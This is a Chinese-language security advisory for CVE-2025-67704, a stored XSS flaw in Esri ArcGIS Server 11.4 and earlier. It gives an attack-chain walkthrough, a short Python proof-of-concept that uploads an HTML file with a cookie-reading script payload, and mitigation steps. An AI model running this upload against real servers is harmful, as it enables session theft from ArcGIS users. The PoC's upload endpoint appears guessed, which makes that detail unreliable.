CVE-2025-67704: Esri ArcGIS Server存储型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-67704

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Esri ArcGIS Server 11.4及更早版本（Windows和Linux）

漏洞概述

CVE-2025-67704是Esri ArcGIS Server中存在的一个存储型跨站脚本（Stored Cross-Site Scripting）漏洞。该漏洞影响ArcGIS Server 11.4及更早版本，在Windows和Linux平台上运行。在某些配置下，此漏洞允许远程未认证攻击者上传包含恶意代码的文件。当其他用户访问或查看这些被污染的文件时，恶意脚本会在受害者浏览器上下文中执行，从而实现对用户会话的劫持、敏感信息的窃取或在用户不知情的情况下执行未经授权的操作。由于攻击载荷被永久存储在服务器端，漏洞具有持久性危害，任何访问被污染资源的用户都可能受到攻击。此漏洞的CVSS评分为6.1，属于中等严重程度，主要因为其需要用户交互才能触发，且影响范围主要为机密性和完整性的低级别影响。攻击者无需任何认证凭证即可实施攻击，这大大降低了漏洞利用的门槛。企业用户应尽快评估自身环境并采取相应的安全措施。

技术细节

该存储型XSS漏洞源于ArcGIS Server在处理文件上传时缺乏充分的输入验证和输出编码。攻击者利用服务器端文件上传功能，将包含恶意JavaScript代码的文件（如HTML、SVG或其他可被浏览器解析的文件类型）上传到服务器。由于服务器未对这些文件内容进行安全过滤或编码处理，恶意代码被永久存储在服务器上。当其他用户通过Web界面访问这些被污染的文件时，服务器将文件内容直接返回给用户浏览器，恶意JavaScript代码随之执行。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户身份、进行钓鱼攻击或在用户上下文中执行任意操作。漏洞的利用条件包括：服务器允许未认证用户上传文件，且上传的文件可被Web用户访问。修复方案需在文件上传时进行严格的MIME类型检查、内容扫描和白名单过滤，在文件输出时对所有用户可控内容进行适当的HTML编码或使用Content Security Policy（CSP）头进行防护。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标ArcGIS Server版本，确认其为11.4或更早版本，并探测可用的文件上传端点

STEP 2

步骤2: 漏洞识别

攻击者发现服务器允许未认证用户上传文件，且上传的文件可直接通过Web访问

STEP 3

步骤3: 恶意文件上传

攻击者构造包含XSS payload的文件（如HTML、SVG文件），通过文件上传接口将其上传到服务器

STEP 4

步骤4: 持久化存储

恶意文件被服务器存储，由于缺乏输入验证，恶意代码被永久保存在服务器端

STEP 5

步骤5: 诱导用户访问

攻击者通过社会工程学手段诱导合法用户访问被污染的文件链接

STEP 6

步骤6: XSS执行

当受害用户浏览器加载该文件时，恶意JavaScript代码在用户上下文中执行，可窃取Cookie、会话令牌等敏感信息

STEP 7

步骤7: 账户劫持

攻击者利用窃取的凭证进行横向移动或完全接管受害用户的ArcGIS账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-67704 Stored XSS PoC for Esri ArcGIS Server
# Target: Esri ArcGIS Server 11.4 and earlier

TARGET_URL = "https://target-server.com/arcgis"
XSS_PAYLOAD = '<script>alert(document.cookie)</script>'

def exploit_stored_xss():
    """
    Exploits CVE-2025-67704: Stored XSS in Esri ArcGIS Server
    This PoC demonstrates uploading a malicious file containing XSS payload
    """
    # Malicious file content with XSS payload
    malicious_content = f'''<!DOCTYPE html>
<html>
<head><title>File Upload</title></head>
<body>{XSS_PAYLOAD}</body>
</html>'''
    
    # File upload endpoint (typical ArcGIS upload endpoint)
    upload_url = f"{TARGET_URL}/rest/services/upload"
    
    files = {
        'file': ('malicious.html', malicious_content, 'text/html')
    }
    
    try:
        # Send malicious file upload request (no authentication required)
        response = requests.post(upload_url, files=files, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] File uploaded successfully")
            print(f"[+] Payload: {XSS_PAYLOAD}")
            print(f"[+] Any user viewing this file will trigger the XSS")
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-67704 Stored XSS PoC")
    print("Target: Esri ArcGIS Server")
    exploit_stored_xss()

影响范围

Esri ArcGIS Server <= 11.4 (Windows)

Esri ArcGIS Server <= 11.4 (Linux)

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）禁用或限制未认证用户的文件上传功能；2）实施严格的文件类型白名单策略，仅允许上传安全文件类型；3）配置Web应用防火墙规则检测XSS特征；4）启用Content-Security-Policy响应头限制脚本执行；5）监控日志关注异常的文件上传行为；6）限制上传文件的存储位置，确保其无法通过Web直接访问；7）对所有输出内容进行HTML实体编码转义。